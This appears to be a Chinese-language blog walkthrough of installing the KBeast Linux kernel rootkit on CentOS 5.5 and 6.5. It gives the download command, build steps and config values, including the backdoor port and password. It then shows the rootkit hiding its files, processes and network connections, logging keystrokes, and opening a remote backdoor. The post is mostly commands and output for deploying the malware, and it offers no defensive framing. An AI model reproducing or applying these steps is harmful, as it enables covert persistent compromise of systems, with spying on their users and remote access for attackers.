内核级rootkit Kbeast的安装与使用

Jumbo

http://core.ipsecs.com/rootkit/kernel-rootkit/kbeast-v1/
功能如下：
    > Hiding this loadable kernel module
    > Hiding files/directory
    > Hiding process (ps, pstree, top, lsof)
    > Hiding socket and connections (netstat, lsof)
    > Keystroke logging to capture user activity
    > Anti-kill process
    > Anti-remove files
    > Anti-delete this loadable kernel modules
    > Local root escalation backdoor
    > Remote binding backdoor hidden by the kernel rootkit

安装脚本支持的内核版本有2.6.16, 2.6.18, 2.6.32, and 2.6.35。
安装步骤如下：
    > wget http://core.ipsecs.com/rootkit/k ... cs-kbeast-v1.tar.gz
    > tar zxvf ipsecs-kbeast-v1.tar.gz
    > cd kbeast-v1/
    > modify config.h to meet your requirement, remember that _MAGIC_NAME_
      must be user with sh/bash shell
    > In order to install in kernel 2.6.16 or 2.6.18, execute ./setup build 0
    > In order to install in kernel 2.6.32 or 2.6.35, execute ./setup build
      (actually it should work for the recent kernel)
    > In order to install in kernel 2.6.9, edit .cc1 file to remove all sys_unlinkat()
      related code, modify syscall table address manually, then execute ./setup build 0

需要注意的是重启后就会失效，所以需要加入开机启动中。

CentOS6.5下测试
测试机器内核：
[root@vincent kbeast-v1]# uname -r
2.6.32-431.el6.x86_64
安装提示：
[root@vincent kbeast-v1]# ./setup build
Checking for Kernel Header : [NOT OK] - Please Install!
这里是因为没有装对应版本内核头文件，来看下setup脚本
LIB_MODULES="/lib/modules/`uname -r`/build"
方便测试，我升级下内核和头文件到最新，然后重启。

继续执行报错：Compiling Kernel Module : [NOT OK]
来看看setup的脚本。
echo -n "Compiling Kernel Module : "
$MAKEZ > /dev/null 2>&1
IS_EXIST $MOD_KFILE
会先进行编译，然后查看编译后文件中是否有ipsecs-kbeast-v1.ko文件，如果没有该文件就会提示NOT OK，此处编译没有成功。

CentOS5.5下测试
测试机器内核：
[root@localhost _h4x_]# uname -r
2.6.18-409.el5
1）安装
安装成功：
[root@localhost kbeast-v1]# ./setup build 0
Checking for Kernel Beast : [OK]
Checking for sed : /bin/sed
Generating C file from .cc1 : [OK]
Checking for Makefile : [OK]
Checking for Network Daemon : [OK]
Checking for Config File : [OK]
Checking for Kernel Header : [OK]
Checking for gcc : /usr/bin/gcc
Checking for make : /usr/bin/make
Checking for kernel version : [OK]
Creating Install Directory : [OK]
Compiling Kernel Module : [OK]
Compiling Network Daemon File : [OK]
Inserting Loadable Kernel Module : [OK]
Running Network Daemon for Remote Access :
This account is currently not available.
Build Complete!

TO DO : modify init script to load this backdoor at start-up
Example can be found on ./init/ directory
需要注意：
早配置文件config.h中#define _MAGIC_NAME_ "vincent"一定要是一个有/bin/bash的账户。
#define _H4X_PATH_ "/usr/_h4x_"  路径
#define _LOGFILE_ "acctlog" 键盘记录
#define _HIDE_PORT_ 13377 后门端口
#define _RPASSWORD_ "h4x3d" 后门密码
2）后门
使用nmap扫描，发现13377端口开放
[root@vincent ~]# nmap -p- 172.16.100.153

Starting Nmap 5.51 ( http://nmap.org ) at 2016-05-31 18:48 CST
Nmap scan report for 172.16.100.153
Host is up (0.000041s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
111/tcp   open  rpcbind
791/tcp   open  unknown
13377/tcp open  unknown
直接使用telnet连接后门
[url=http://static.wooyun.org/upload/image/201606/2016060714542316921.png][/url]
3）连接隐藏
使用netstat查看，连接是隐藏的
[root@localhost usr]# netstat -ano | grep 13377
[root@localhost usr]#
4）文件隐藏
/usr/_h4x_是隐藏的，ll无法查看，可以cd到这个目录下
[root@localhost usr]# ll /usr/
总计 216
drwxr-xr-x   2 root root 49152 03-23 01:24 bin
drwxr-xr-x   2 root root  4096 2010-01-27 etc
drwxr-xr-x   2 root root  4096 2010-01-27 games
drwxr-xr-x  37 root root  4096 03-23 00:40 include
drwxr-xr-x   6 root root  4096 03-22 23:13 kerberos
drwxr-xr-x  67 root root 20480 03-23 01:24 lib
drwxr-xr-x  94 root root 40960 03-23 01:24 lib64
drwxr-xr-x  10 root root  4096 03-23 01:24 libexec
drwxr-xr-x  12 root root  4096 03-22 23:12 local
drwxr-xr-x   2 root root 16384 03-23 01:24 sbin
drwxr-xr-x 197 root root  4096 03-22 23:31 share
drwxr-xr-x   4 root root  4096 03-22 23:12 src
lrwxrwxrwx   1 root root    10 03-22 23:12 tmp -> ../var/tmp
drwxr-xr-x   3 root root  4096 03-22 23:12 X11R6
[root@localhost usr]# cd /usr/_h4x_
[root@localhost _h4x_]# ls
acctlog.0              config.h            ipsecs-kbeast-v1.cc1    ipsecs-kbeast-v1.mod.o  Makefile        README.TXT
acctlog.500            init                ipsecs-kbeast-v1.ko     ipsecs-kbeast-v1.o      Module.markers  setup
bd-ipsecs-kbeast-v1.c  ipsecs-kbeast-v1.c  ipsecs-kbeast-v1.mod.c  LICENSE                 Module.symvers
5）键盘记录
[root@localhost _h4x_]# cat acctlog.0
[30/03/2016-14:20:06] - [UID = 0 ] bash > ps aux
[30/03/2016-14:20:33] - [UID = 0 ] bash > [UP] | grep h4x
[30/03/2016-14:21:02] - [UID = 0 ] bash > ps xua | grep 3617
[30/03/2016-14:21:11] - [UID = 0 ] bash > ps -ef
6）进程隐藏
直接ps查看无法看到该进程，但是可以grep可以看到。
[root@localhost _h4x_]# ps xua | grep h4x
vincent   3617  0.0  0.1  66108  1584 ?        Ss   15:20   0:00 ./_h4x_bd